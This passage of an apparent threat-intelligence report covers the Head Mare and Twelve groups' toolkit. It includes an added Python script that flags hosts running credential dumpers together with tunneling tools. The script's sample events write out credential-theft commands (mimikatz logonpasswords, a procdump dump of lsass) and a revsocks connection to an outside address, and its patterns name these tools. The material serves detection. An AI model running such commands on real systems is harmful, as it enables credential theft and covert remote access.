Introduction
In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.
The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.
This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.
Technical details
Head Mare’s toolkit
The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals:
mimikatz;
ADRecon;
secretsdump;
ProcDump;
Localtonet;
revsocks;
ngrok;
cloudflared;
Gost;
fscan;
SoftPerfect Network Scanner;
mRemoteNG;
PsExec;
smbexec;
wmiexec;
LockBit 3.0;
Babuk.
Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.
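Because every item in the list above is a publicly available tool, the practical question for a defender is not "is this binary malicious" but "which of these ran together on the same host". The following triage script is an added example and is not code from the report or from Kaspersky. It groups the page's tool names into the roles they typically play (credential access, discovery, tunneling, lateral movement) and escalates hosts where a credential dumper and a tunneling tool both appear. The role mapping, the `netscan` binary name for SoftPerfect Network Scanner, the `sekurlsa::`/`lsadump::` command-line markers for renamed mimikatz, and the sample process-creation events are all assumptions constructed for this example; they are not indicators published on the page.

```python
"""Triage constructed process-creation events for the publicly available
tooling named in the Head Mare toolkit list.

Added example, not code from the original report or from Kaspersky.
Role grouping, binary names and sample events are assumptions made here.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, Optional, Set

# Patterns searched against the image basename and the command line.
# Role assignment is this example's assumption; the report only lists names.
TOOL_ROLES = {
    "credential_access": [
        r"mimikatz", r"secretsdump", r"procdump",
        r"sekurlsa::", r"lsadump::",   # mimikatz module syntax survives a renamed binary
    ],
    "discovery": [r"adrecon", r"fscan", r"netscan"],  # netscan.exe assumed for SoftPerfect
    "tunneling": [r"localtonet", r"revsocks", r"ngrok", r"cloudflared", r"gost"],
    "lateral_movement": [r"psexec", r"smbexec", r"wmiexec"],
}

COMPILED = {
    role: re.compile("|".join(pats), re.IGNORECASE)
    for role, pats in TOOL_ROLES.items()
}


def classify(image: str, cmdline: str) -> Optional[str]:
    """Return the first matching role for one event, or None."""
    basename = image.replace("\\", "/").rsplit("/", 1)[-1]
    haystack = f"{basename} {cmdline}"
    for role, rx in COMPILED.items():
        if rx.search(haystack):
            return role
    return None


def triage(events: Iterable[dict]) -> Dict[str, Set[str]]:
    """Map each host to the set of tool roles observed on it."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        role = classify(ev["image"], ev["cmdline"])
        if role:
            hits[ev["host"]].add(role)
    return dict(hits)


def escalate(hits: Dict[str, Set[str]],
             required=("credential_access", "tunneling")) -> list:
    """Hosts where every required role was seen, e.g. dumper plus tunneler."""
    return sorted(h for h, roles in hits.items()
                  if all(r in roles for r in required))


# Constructed Sysmon-style events (hypothetical hosts, paths and addresses).
SAMPLE_EVENTS = [
    # Renamed mimikatz: caught by module syntax, not by image name.
    {"host": "WS-017", "image": r"C:\Users\Public\mm.exe",
     "cmdline": "mm.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "WS-017", "image": r"C:\Users\Public\revsocks.exe",
     "cmdline": "revsocks.exe -connect 203.0.113.10:443 -pass x"},
    {"host": "WS-017", "image": r"C:\Windows\Temp\procdump64.exe",
     "cmdline": "procdump64.exe -ma lsass.exe out.dmp"},
    {"host": "DC-01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ADRecon.ps1"},
    {"host": "DC-01", "image": r"C:\Windows\Temp\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run"},
    {"host": "FS-02", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    observed = triage(SAMPLE_EVENTS)
    for host, roles in sorted(observed.items()):
        print(host, sorted(roles))
    print("escalate:", escalate(observed))
```

Name matching is deliberately weak on its own: an operator who renames `mimikatz.exe` defeats it, which is why the command-line markers are included and why the escalation rule keys on the combination of roles per host rather than on any single tool. In a real deployment the role table would be extended with hashes and known command-line shapes for each tool.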
Notable new tools
Among the tools used by Head Mare were some not previously employed by the group but seen in attacks by other actors. For instance, the CobInt backdoor was used for remote access to domain controllers; before these incidents it had been observed only in Twelve's attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare ..